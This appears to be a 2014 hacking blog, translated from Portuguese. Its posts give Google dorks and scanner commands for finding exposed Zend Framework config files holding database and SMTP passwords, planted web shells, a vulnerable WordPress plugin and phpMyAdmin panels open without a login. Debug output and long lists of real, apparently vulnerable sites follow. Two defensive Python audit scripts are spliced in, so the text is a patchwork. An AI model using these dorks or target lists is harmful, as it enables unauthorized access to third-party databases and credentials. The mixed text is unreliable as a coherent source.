
Wednesday, July 16, 2014

Exploiting the Zend Framework Full Info Disclosure flaw

This flaw exposes the .ini configuration files of web applications built on Zend Framework; these files contain database and SMTP passwords.

Vulnerability[0]=> http://target.com/application/configs/{file}.ini
Example:
http://target.com/application/configs/application.ini
http://target.com/application/configs/db.ini
http://target.com/application/configs/config.ini

In the file contents we can find the following parameters.


; database access credentials
resources.db.params.host = "mysql.target.com.br"
resources.db.params.username = "root"
resources.db.params.password = "123455"


; and also SMTP access credentials
resources.mail.transport.host = "smtp.target.com.br"
resources.mail.transport.auth = "login"
resources.mail.transport.username = "wangxydlutre"
resources.mail.transport.password = "12333"


DORK[0]=> inurl:/application/configs/application.ini

DORK[1]=>
site:com ext:ini inurl:/application/  -inurl:"git*" -github -assembla -inurl:mozilla -inurl:google "params.password"

DORK[2]=> -site:.google.com -site:.github.com -site:.sourceforge.net -site:.googlecode.com inurl:/application/configs/ "params" ext:ini

DORK[3]=> inurl:/configs/ "params.password" db.ini ext:ini

DORK[4]=> -github.com -mozilla.org -.google.com inurl:/application/  ext:ini password



[+][ COMMAND SCANNER INURLBR ]
./inurlbr.php --dork 'site:com ext:ini inurl:/application/  -github -assembla -inurl:mozilla -inurl:svn "params.password"'  -s zend.txt -q 1,6,7,14,22


[+][ VALIDATION ZEND FRAMEWORK ]
$validation['ZEND-FRAMEWORK-01'] = 'mail.transport.username';
$validation['ZEND-FRAMEWORK-02'] = 'mail.transport.password';
$validation['ZEND-FRAMEWORK-03'] = 'db.params.username';
$validation['ZEND-FRAMEWORK-04'] = 'db.params.password';
$validation['ZEND-FRAMEWORK-05'] = 'db.params.dbname';
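As an added defensive example (not code from the original post or from the INURLBR tool), the following Python flags requests for these .ini files in a combined-format web server access log and lists which of the post's marker keys actually carry a value in a given application.ini. The log lines, hosts and values are constructed for the example; the key names and path pattern are the ones the post describes.

```python
import re

# Combined Log Format as written by Apache and nginx by default.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Any .ini under application/configs/ (or config(s)/), with or without the
# trailing "?" that the dork hits in the post carry.
CONFIG_PATH_RE = re.compile(
    r'/(?:application/)?configs?/[^/?]+\.ini(?:\?.*)?$', re.IGNORECASE)

# The same marker keys the post uses as its ZEND-FRAMEWORK-0x validation strings.
CREDENTIAL_KEYS = (
    'mail.transport.username',
    'mail.transport.password',
    'db.params.username',
    'db.params.password',
    'db.params.dbname',
)


def parse_log_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    rec['size'] = 0 if rec['size'] == '-' else int(rec['size'])
    return rec


def find_config_probes(lines):
    """One record per request for a config .ini; 'disclosed' means the file was served."""
    hits = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None or not CONFIG_PATH_RE.search(rec['path']):
            continue
        hits.append({
            'ip': rec['ip'],
            'path': rec['path'],
            'status': rec['status'],
            # 200 with a body = the probe got the file; 403/404 = blocked probe.
            'disclosed': rec['status'] == 200 and rec['size'] > 0,
        })
    return hits


def exposed_credential_keys(ini_text):
    """Marker keys with a non-empty value: what a successful probe would have obtained."""
    found = []
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line[0] in ';#[':      # blank, comment or [section] line
            continue
        key, _, value = line.partition('=')
        key = key.strip()
        value = value.strip().strip('"\'')
        for marker in CREDENTIAL_KEYS:
            if key.endswith(marker) and value:
                found.append(marker)
    return found


# Constructed sample data (RFC 5737 addresses, example.com hosts, made-up values).
SAMPLE_LOG = """
203.0.113.7 - - [16/Jul/2014:10:01:02 -0300] "GET /application/configs/application.ini? HTTP/1.1" 200 1342 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Jul/2014:10:01:03 -0300] "GET /application/configs/db.ini HTTP/1.1" 404 211 "-" "Mozilla/5.0"
198.51.100.4 - - [16/Jul/2014:10:02:10 -0300] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [16/Jul/2014:10:03:44 -0300] "GET /application/configs/config.ini HTTP/1.1" 403 199 "-" "curl/7.35.0"
"""

SAMPLE_INI = """
[production]
resources.db.params.host = "db.example.com"
resources.db.params.username = "appuser"
resources.db.params.password = "placeholder-not-a-real-secret"
resources.db.params.dbname = "appdb"
resources.mail.transport.host = "smtp.example.com"
resources.mail.transport.auth = "login"
resources.mail.transport.username = "mailer"
resources.mail.transport.password = ""
"""


def sample_probes():
    """Run the log check over the constructed sample: three probes, one disclosed."""
    return find_config_probes(SAMPLE_LOG.strip().splitlines())


if __name__ == '__main__':
    for hit in sample_probes():
        print(hit)
    print(exposed_credential_keys(SAMPLE_INI))
```

The lasting fix is Zend's standard layout, where only public/ is the document root so application/configs/ is never reachable over HTTP; if the whole project directory must be served, deny access to *.ini in the web server configuration.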

0xExample of findings (Zend):

Exploit:
http://www.exploit-db.com/exploits/29921/

Friday, June 20, 2014

DORK to find non-object errors

Searching for pages that leak PDO error-handling failures or errors from plain SQL/object queries.


----------------------------------------------------------------------------------------------------------------------------
DORK:
inurl:br  intext:"Warning" || intext:"notice" "non-object in /" -"Revista PHP" -inurl:forum.
----------------------------------------------------------------------------------------------------------------------------
DORK encontra erros non-object
0xHOST GOOGLE........: www.google.com.br
0xDORK...............: inurl:br   intext:"Warning" || intext:"notice" "non-object in /" -"Revista PHP" -inurl:forum.
0xEXPLOIT............:
0xARQUIVO............: resultados.txt
0xTIPO DE ERRO.......: 2
0xPROCURAR NO ALVO...: non-object in
0xCOMANDO TERMINAL...: ping -c _ALVO_
0xIP PROXY...........:
0xPORTA..............:

----------------------------------------------------------------------------------------------------------------------------

DEBUG:
Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => inurl%3Abr+++intext%3A%22Warning%22+%7C%7C+intext%3A%22notice%22+%22non-object+in+%2F%22+-%22Revista+PHP%22+-inurl%3Aforum.
    [arquivo] => resultados.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => non-object in
    [cmd] => ping -c _ALVO_
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=inurl%3Abr+++intext%3A%22Warning%22+%7C%7C+intext%3A%22notice%22+%22non-object+in+%2F%22+-%22Revista+PHP%22+-inurl%3Aforum.&num=1900&btnG=Search
    [port] => 80
)
RESULTADO:

TOTAL DE URL's: 196
EXPLOIT USADO:
DORK: inurl%3Abr+++intext%3A%22Warning%22+%7C%7C+intext%3A%22notice%22+%22non-object+in+%2F%22+-%22Revista+PHP%22+-inurl%3Aforum.
TOTAL DE POSSÍVEIS VULL: 78
ARQUIVO COM RESULTADO:resultados.txt
LISTA:


Wednesday, June 11, 2014

Grabbing that sneaky shell with a dork


R57 PEI PEI PEI I GOT INTO YOUR 0xHACKINAGEM s2

0xDORK[0]: intext:"r57shell" || intext:"c99 shell" & intext:"safe_mode:"  &  -github -google -assembla -forum ext:php  *2014

0xDEBUG SCANNER INURL:
0xDownload: http://pastebin.com/TzijC99y
Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => intext%3A%22r57shell%22+%7C%7C+intext%3A%22c99+shell%22+%26+intext%3A%22safe_mode%3A%22++%26++-github+-google+-assembla+-forum+ext%3Aphp++%2A2014
    [arquivo] => resultados.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => safe_mode:
    [cmd] => ping -c 1 _ALVO_
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=intext%3A%22r57shell%22+%7C%7C+intext%3A%22c99+shell%22+%26+intext%3A%22safe_mode%3A%22++%26++-github+-google+-assembla+-forum+ext%3Aphp++%2A2014&num=1900&btnG=Search
    [port] => 80
)

0x[SOME FINDINGS]

Tuesday, June 10, 2014

Exploit Participants Database <= 1.5.4.8 Wordpress

0xParticipants Database
Wordpress Participants Database 1.5.4.8 - SQL Injection

It is a popular WordPress plugin that provides the functionality needed to build and maintain a database of people.

- Details of the Vulnerability

1. Because of insufficient privilege checks, an anonymous (unauthenticated) user can trigger some administrative actions whenever one of the plugin's shortcodes is in use (for example, the signup page).

2. The "export CSV" action has a parameter named "query" that may contain an arbitrary SQL query.
This means an unauthenticated user can execute arbitrary SQL statements (for example, create an administrator user, read or write files, or execute code, depending on the privileges of the MySQL user).

----------------------------------------------------------------------------------------------------------------------------------
0xEXPLOIT:
http://www.exploit-db.com/exploits/33613/


0xDORK[0]:"Index of" "/wp-content/uploads/participants-database"
0xDORK[1]:inurl:"pdb-signup/" "PDB signup"
0xDORK[2]:inurl:"pdb-signup/" intitle:"PDB signup "
----------------------------------------------------------------------------------------------------------------------------------
DEBUG:
Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => %22Index+of%22+%22%2Fwp-content%2Fuploads%2Fparticipants-database%22
    [arquivo] => resultados.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => Index of /wp-content/uploads/participants-database
    [cmd] => ping -c 1 _ALVO_
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=%22Index+of%22+%22%2Fwp-content%2Fuploads%2Fparticipants-database%22&num=1900&btnG=Search
    [port] => 80
)

RESULTADO PARCIAL:


http://webcache.googleusercontent.com/search?q=cache:kUL3synKmD0J:http://ebookily.org/xls/gassendi%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:WuVzKwF26PUJ:http://ebookily.org/xls/kathak-dress%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk

 http://webcache.googleusercontent.com/search?q=cache:OZ9vR__pkOgJ:http://www.tag.ubc.ca/iswnetwork.ca/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
 http://webcache.googleusercontent.com/search?q=cache:MS8BxtAMxoAJ:http://www.shreeyashmatrimonial.com/kiran/d/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:l8rmzvOyZOkJ:http://www.younguttarakhand.org/wp/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
 http://webcache.googleusercontent.com/search?q=cache:t43d046zpLQJ:http://partycrewgh.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:3kQuvZzwr6EJ:http://top3crew.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:gpBnRGnjbxcJ:http://sdara.com/sdarawebsite/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:nHBeHM57ojEJ:http://qsaudi.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:8yfwjuM8apgJ:http://www.blc-denver2.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk

http://webcache.googleusercontent.com/search?q=cache:1uEWo4ctyKYJ:http://www.csa.us/www/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:G64f413f7V4J:http://www.gcm73.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:vSoBRrZja70J:http://www.powercollaborative.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:VyTtsWKYn2gJ:http://cccc-houston.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
 http://webcache.googleusercontent.com/search?q=cache:BAh_697eT80J:http://www.mjbandofgold.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:Luc-zFtM2nEJ:http://www.gapfootball.org.au/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:R6DbMAITjosJ:http://www.4k-nn.ru/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
 http://webcache.googleusercontent.com/search?q=cache:1ZHqjROYqJ8J:http://www.bcscpa.com/bcs-blog/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:-4lNmZAQJTYJ:http://graceland4kids.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk

http://webcache.googleusercontent.com/search?q=cache:seg55mSkGSoJ:http://emeraldtigers.com.au/new_2013_website/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:nR8gLIEbCOEJ:http://artisanwineclub.com/index/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:cn3Yz66lQ-AJ:http://www.dsnyfamily.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:7W_fZ-33EVQJ:http://promovgroup.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:KT4lO7pNnswJ:http://www.rebbepiper.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk

 http://webcache.googleusercontent.com/search?q=cache:oujptjZTnnMJ:http://www.firt2013barcelona.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://www.thrombose-cancer.com/wp-content/uploads/participants-database/
http://www.iaodapca.org/wp-content/uploads/participants-database/
http://steppingstoneschina.net/wp-content/uploads/participants-database/
http://leg0lad.com/wp-content/uploads/participants-database/
http://www.nuis.co.il/wp-content/uploads/participants-database/
http://www.bikesforhumanity.com.au/wp-content/uploads/participants-database/
http://lanj.org/wp-content/uploads/participants-database/
http://gearupnv.org/wp-content/uploads/participants-database/
http://www.chruit.ch/wp-content/uploads/participants-database/
http://comartspartner.org/wp-content/uploads/participants-database/
http://thezonegroup.com/wp-content/uploads/participants-database/
http://www.alleywatch.com/wp-content/uploads/participants-database/
http://www.fundraisingwithcheese.com/wp-content/uploads/participants-database/
http://lifespringcommunitychurch.net/wp-content/uploads/participants-database/
http://www.wright-b-flyer.org/wp-content/uploads/participants-database/
http://www.fastenershows.com/wp-content/uploads/participants-database/
http://www.agavs.ca/wp-content/uploads/participants-database/
http://d70toastmasters.org.au/wp-content/uploads/participants-database/
http://lincolnillinois.com/wp-content/uploads/participants-database/
http://highbrookrotary.org.nz/wp-content/uploads/participants-database/
http://ptfund.org/wp-content/uploads/participants-database/
http://utahvalley360.com/wp-content/uploads/participants-database/
http://bamta.org/wp-content/uploads/participants-database/
http://nwapa.net/wp-content/uploads/participants-database/
http://victoryparkandsell.com/wp-content/uploads/participants-database/
http://nantmp.org.ng/wp-content/uploads/participants-database/
http://saafrica.org/wp-content/uploads/participants-database/
http://www.atpca.com.au/wp-content/uploads/participants-database/
http://uwtwinregistry.org/wp-content/uploads/participants-database/
http://swiggis-austin.org/wp-content/uploads/participants-database/
http://www.churchspirituallifenh.org/wp-content/uploads/participants-database/
http://mac.mb.ca/wp-content/uploads/participants-database/
http://www.mwphglotx.org/wp-content/uploads/participants-database/
http://www.diinstitute.org/wp-content/uploads/participants-database/
http://www.sbsonline.com.au/wp-content/uploads/participants-database/
http://soulmotion.com/wp-content/uploads/participants-database/
http://www.vancouveraikido.com/wp-content/uploads/participants-database/
http://www.isce.org.uk/wp-content/uploads/participants-database/
http://www.celinamercer.com/wp-content/uploads/participants-database/
http://www.cmtnl.ca/wp-content/uploads/participants-database/
http://www.saroregon.org/wp-content/uploads/participants-database/
http://welshchoir.ca/wp-content/uploads/participants-database/
http://www.pnmc-hsr.org/wp-content/uploads/participants-database/
http://annwagner.com/wp-content/uploads/participants-database/
http://iyba.lasalle.org/wp-content/uploads/participants-database/
http://lpforest.org/wp-content/uploads/participants-database/
http://www.aedunlv.org/wp-content/uploads/participants-database/
http://walkabout.happeningfish.com/wp-content/uploads/participants-database/
http://www.northernarizonaaudubon.org/wp-content/uploads/participants-database/
http://claysportsirl.ie/wp-content/uploads/participants-database/
http://polyathlon-russia.com/wp-content/uploads/participants-database/
http://luislondon.com/wp-content/uploads/participants-database/
http://whatcomwritersandpublishers.org/wp-content/uploads/participants-database/
http://www.financesmediterranee.com/wp-content/uploads/participants-database/
http://bitroop1496.org/wp-content/uploads/participants-database/
http://www.firt2013barcelona.org/wp-content/uploads/participants-database/
http://www.rebbepiper.com/wp-content/uploads/participants-database/
http://promovgroup.com/wp-content/uploads/participants-database/
http://www.mjbandofgold.com/wp-content/uploads/participants-database/
http://cccc-houston.org/wp-content/uploads/participants-database/
http://www.powercollaborative.org/wp-content/uploads/participants-database/
http://www.isarmc.org/wp-content/uploads/participants-database/
http://www.blc-denver2.org/wp-content/uploads/participants-database/
http://qsaudi.com/wp-content/uploads/participants-database/
http://erosrws.com/wp-content/uploads/participants-database/
http://top3crew.com/wp-content/uploads/participants-database/
http://partycrewgh.org/wp-content/uploads/participants-database/

Thursday, 29 May 2014

Accessing a PHPMyAdmin database without authentication

Summary:
phpMyAdmin is a web application written in PHP for administering MySQL over the Internet. With it you can create and drop databases, create, drop and alter tables, insert, delete and edit fields, run SQL code and manage key fields. phpMyAdmin is widely used by web developers who often need to manipulate databases. It is normally treated as a mandatory tool on almost every web host, as well as in off-line packages such as WAMPServer, XAMPP, EasyPHP and PHP Triad.

ACCESS DORKS:
 -------------------------------------------------------------------------------------------------------------------------------
inurl:"server_variables.php?token="
inurl:"/index.php?target=server_variables.php"
inurl:"server_processlist.php?" intext:" SHOW PROCESSLIST " & intitle:"phpMyAdmin"
inurl:"server_engines.php?token="
inurl:"server_sql.php?token="
inurl:"server_import.php?token="
inurl:"server_export.php?token="
inurl:"db_structure.php?db="
inurl:"main.php?token=" phpMyAdmin
inurl:"server_collations.php?token="
-------------------------------------------------------------------------------------------------------------------------------

Example of access:
DATABASE ACCESS



The dorks were built from the access URLs; for some installations they will not return results, because the panel uses an iframe scheme with the following menu URLs.


<li><a class="tab" href="server_databases.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_db.png" width="16" height="16" alt="Databases" />Databases</a></li>
<li><a class="tab" href="server_sql.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/b_sql.png" width="16" height="16" alt="SQL" />SQL</a></li>
<li><a class="tab" href="server_status.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_status.png" width="16" height="16" alt="Status" />Status</a></li>
<li><a class="tab" href="server_variables.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_vars.png" width="16" height="16" alt="Variables" />Variables</a></li>
<li><a class="tab" href="server_collations.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_asci.png" width="16" height="16" alt="Charsets" />Charsets</a></li>
<li><a class="tab" href="server_engines.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/b_engine.png" width="16" height="16" alt="Engines" />Engines</a></li>
<li><a class="tabactive" href="server_processlist.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_process.png" width="16" height="16" alt="Processes" />Processes</a></li>
<li><a class="tab" href="server_export.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/b_export.png" width="16" height="16" alt="Export" />Export</a></li>
<li><a class="tab" href="server_import.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/b_import.png" width="16" height="16" alt="Import" />Import</a></li>
</ul>

NOTE: Some servers will not give you access to the tables right away; in that case use the SQL executor.
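Why a panel opens with no login at all: in phpMyAdmin's config.inc.php the directive $cfg['Servers'][$i]['auth_type'] = 'config' makes the panel log every visitor in with the user/password stored in the file, and AllowNoPassword = true lets accounts with an empty password in. The audit below is an added example (not the blog's code and not phpMyAdmin's); the directive names are phpMyAdmin's own, while the two config fragments are constructed samples.

```python
import re

# Constructed sample config.inc.php fragments (not taken from any real server).
# The directive names (auth_type, AllowNoPassword, user, password, AllowRoot)
# are phpMyAdmin's own.
WEAK_CONFIG = r"""
<?php
$i = 0;
$i++;
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
"""

HARDENED_CONFIG = r"""
<?php
$i = 0;
$i++;
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['AllowNoPassword'] = false;
$cfg['Servers'][$i]['AllowRoot'] = false;
"""

# Matches lines such as:  $cfg['Servers'][$i]['auth_type'] = 'config';
DIRECTIVE_RE = re.compile(
    r"""\$cfg\['Servers'\]\[\$i\]\['(?P<key>\w+)'\]\s*=\s*(?P<val>[^;]+);"""
)


def parse_server_directives(text):
    """Return {key: value} for the per-server directives in a config.inc.php text.

    Values are normalised: surrounding quotes are stripped, PHP booleans lowered.
    """
    out = {}
    for m in DIRECTIVE_RE.finditer(text):
        val = m.group("val").strip()
        if val[:1] in ("'", '"') and val[-1:] == val[:1]:
            val = val[1:-1]
        else:
            val = val.lower()
        out[m.group("key")] = val
    return out


def audit_phpmyadmin_config(text):
    """Return a list of findings explaining why the panel would open without a login."""
    d = parse_server_directives(text)
    findings = []
    if d.get("auth_type") == "config":
        # 'config' auth uses the credentials stored in the file for every visitor,
        # so no login form is ever shown: exactly the situation the dorks find.
        findings.append("auth_type=config: stored credentials are used for every visitor")
        if d.get("user") == "root":
            findings.append("stored credentials are for root")
        if d.get("password") == "":
            findings.append("stored password is empty")
    if d.get("AllowNoPassword") == "true":
        findings.append("AllowNoPassword=true: accounts with an empty password can log in")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_phpmyadmin_config(cfg) or ["no findings"])
```

The fix on a real installation is the hardened fragment: auth_type 'cookie' (or 'http'), AllowNoPassword false, and no stored user/password in the file.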
Using SCANNER INURL to make the search easier.

Example command:
php botConsole.php --host='www.google.com.br' --dork='inurl:"server_processlist.php?" intext:" SHOW PROCESSLIST " & intitle:"phpMyAdmin" -assembla' --arquivo='MYSQL.txt' --tipoerro='2' --exploit='' --achar='phpMyAdmin'



DEBUG:
----------------------------------------------------------------------------------------------------------------------------
0xHOST GOOGLE........: www.google.com.br
0xDORK...............: inurl:"server_processlist.php?" intext:" SHOW PROCESSLIST " & intitle:"phpMyAdmin" -assembla
0xEXPLOIT............:
0xARQUIVO............: MYSQL.txt
0xTIPO DE ERRO.......: 2
0xPROCURAR NO ALVO...: phpMyAdmin
0xIP PROXY...........:
0xPORTA..............:
----------------------------------------------------------------------------------------------------------------------------
0xCARREGANDO CONFIGURAÇÕES...
DEBUG:
Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => inurl%3A%22server_processlist.php%3F%22+intext%3A%22+SHOW+PROCESSLIST+%22+%26+intitle%3A%22phpMyAdmin%22+-assembla
    [arquivo] => MYSQL.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => phpMyAdmin
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=inurl%3A%22server_processlist.php%3F%22+intext%3A%22+SHOW+PROCESSLIST+%22+%26+intitle%3A%22phpMyAdmin%22+-assembla&num=1900&btnG=Search
    [port] => 80
)



[ DOWNLOAD: http://pastebin.com/TzijC99y ]

REF:
http://pt.wikipedia.org/wiki/PhpMyAdmin
http://www.phpmyadmin.net/


Search results:

http://mech.sharif.ir/~web/phpmyadmin/server_processlist.php
http://www.zumrutcim.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&token=5ee6b4ef3eec67db200cffb4ca96bd97
http://www.nautilus.com.br/clientes/phpmyadmin_barcessat/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=f4e23698e63cb037f9ceb9eae1bd66da
http://www.settimanasudoku.it/mysqladmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=0717590837c536a6b2fdf71b3e3dfb69&full=1&phpMyAdmin=qSVwBZtc8J68bUpNrdmHohiwvO6
http://www.settimanasudoku.it/mysqladmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=629550b445dd53557edc873fea8256a7&full=1&phpMyAdmin=upcVaWZRbIqzaA7ZIn2NC7tcVXa
http://www.settimanasudoku.it/mysqladmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=7850d21f77f5ff41c6a30d1468df949e&full=1&phpMyAdmin=5IeY%2C8tUFuMK6QBK-QvQoDVhkI0
http://contemar.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=25a89618f06d460b726bb902f261dc48
http://contemar.com/phpmyadmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=c0c6689d5bfd46016dfce6ad2e7dfc49
http://kalifaalmisnad.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=d8f0843a76df17a88f489880a8a0fe86
http://webservice.jmasjuarez.gob.mx:8888/phpmyadmin/server_processlist.php?token=3b348ec6ff1b099c465f8ca203656538&full=1
https://www.der-insolvenzberater.de/phpMyAdmin/server_processlist.php?lang=en-utf-8&server=1&collation_connection=utf8_general_ci&kill=209505387
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=01395f779fcfe1160c96f9eb839860af&kill=15710
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=3d4354e7a691623453b29361ea95be24&kill=17812
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=61a9ec4af824fbf24b368f29ba2f36d3&kill=116759
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=ce58de690a926679d6b10589bb1b25a1&kill=15076
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=ae7332a9388dd4763b0f9195b67ce197&kill=148286
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=1d847c6be291d8428d8c828af4fde151&kill=113261
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=be9a026238ab69f456c53337318599a3&kill=22662
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=161b1d193b0032814d65f117af4074cb&kill=12862
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=3ba1c5db1b7c429310ca466d8a3a4f9a&kill=108535
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=1de9baadfb04138dcc81eb84d4b45421&kill=11170
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=1bd8be911d5ea86940f12a7e7bd314c7&kill=15121
